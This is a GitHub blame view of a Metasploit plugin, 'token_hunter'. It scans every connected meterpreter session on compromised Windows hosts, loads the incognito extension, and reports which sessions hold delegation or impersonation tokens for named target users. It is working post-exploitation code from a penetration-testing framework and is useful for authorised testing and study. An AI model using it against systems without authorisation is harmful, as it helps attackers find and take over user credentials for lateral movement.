Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Newer
Older
100644 154 lines (118 sloc) 3.303 kB
6fdf5a4 more cleanups
jduck authored
1 #
2 # $Id$
3 # $Revision$
4 #
5
96234b5 Adds a token hunter plugin for locating a specific user's credentials…
hdm authored
6 module Msf
7
8 class Plugin::TokenHunter < Msf::Plugin
9
10 class TokenCommandDispatcher
11 include Msf::Ui::Console::CommandDispatcher
12
13 def name
14 "Token Hunter"
15 end
16
17 def commands
18 {
19 'token_hunt_user' => "Scan all connected meterpreter sessions for active tokens corresponding to one or more users"
20 }
21 end
22
23 def cmd_token_hunt_user(*args)
24
25 opts = Rex::Parser::Arguments.new(
26 "-h" => [ false, "This help menu"],
9a96495 Fix a trailing comma, breaks ruby 1.8
hdm authored
27 "-f" => [ true, "A file containing a list of users to search for (one per line)"]
96234b5 Adds a token hunter plugin for locating a specific user's credentials…
hdm authored
28 )
29
30 opt_userfile = nil
31 opt_users = []
32
33 opts.parse(args) do |opt, idx, val|
34 case opt
35 when "-h"
36 print_line("Usage: token_hunt_user [options] <username> [username] .. [username]")
37 print_line(opts.usage)
38 return
39 when "-f"
40 opt_userfile = val
41 else
42 opt_users << val
43 end
44 end
45
46 if(opt_userfile)
47 ::File.open(opt_userfile, "rb") do |fd|
48 fd.each_line do |line|
49 line.strip!
50 next if line.empty?
51 next if line =~ /^#/
52 opt_users << line
53 end
54 end
55 end
56
57 opt_users.uniq!
58
59 tokens_del = {}
60 tokens_imp = {}
61
62 framework.sessions.each_key do |sid|
63 session = framework.sessions[sid]
64 next if session.type != "meterpreter"
65
66 print_status(">> Scanning session #{session.sid} / #{session.tunnel_peer}")
67
68 if(! session.incognito)
69 session.core.use("incognito")
70 end
71
72 if(! session.incognito)
73 print_status("!! Failed to load incognito on #{session.sid} / #{session.tunnel_peer}")
74 next
75 end
76
77 res = session.incognito.incognito_list_tokens(0)
78 if(res)
79 res["delegation"].split("\n").each do |user|
80
81 opt_users.each do |needle|
82
83 ndom,nusr = needle.split("\\")
84 if(not nusr)
85 nusr = ndom
86 ndom = nil
87 end
88
89 if(ndom and user.strip.downcase == needle.strip.downcase)
90 print_status("FOUND: #{session.sid} - #{session.tunnel_peer} - #{user} (delegation)")
91 next
92 end
93
94 fdom,fusr = user.split("\\")
95
96 if (! ndom and fusr.strip.downcase == nusr.strip.downcase)
97 print_status("FOUND: #{session.sid} - #{session.tunnel_peer} - #{user} (delegation)")
98 end
99 end
100
101 tokens_del[user] ||= []
102 tokens_del[user] << session.sid
103 end
104
105
106 res["impersonation"].split("\n").each do |user|
107
108 opt_users.each do |needle|
109 ndom,nusr = needle.split("\\")
110 if(not nusr)
111 nusr = ndom
112 ndom = nil
113 end
114
115 if(ndom and user.strip.downcase == needle.strip.downcase)
116 print_status(">> Found #{session.sid} - #{session.tunnel_peer} - #{user} (impersonation)")
117 next
118 end
119
120 fdom,fusr = user.split("\\")
121 if (! ndom and fusr.strip.downcase == nusr.strip.downcase)
122 print_status(">> Found #{session.sid} - #{session.tunnel_peer} - #{user} (impersonation)")
123 end
124 end
125
126 tokens_imp[user] ||= []
127 tokens_imp[user] << session.sid
128 end
129 end
130 end
131 end
132 end
133
134
135 def initialize(framework, opts)
136 super
137 add_console_dispatcher(TokenCommandDispatcher)
138 end
139
140 def cleanup
141 remove_console_dispatcher('Token Hunter')
142 end
143
144 def name
145 "token_hunter"
146 end
147
148 def desc
149 "Search all active meterpreter sessions for specific tokens"
150 end
151 end
152 end
153
Something went wrong with that request. Please try again.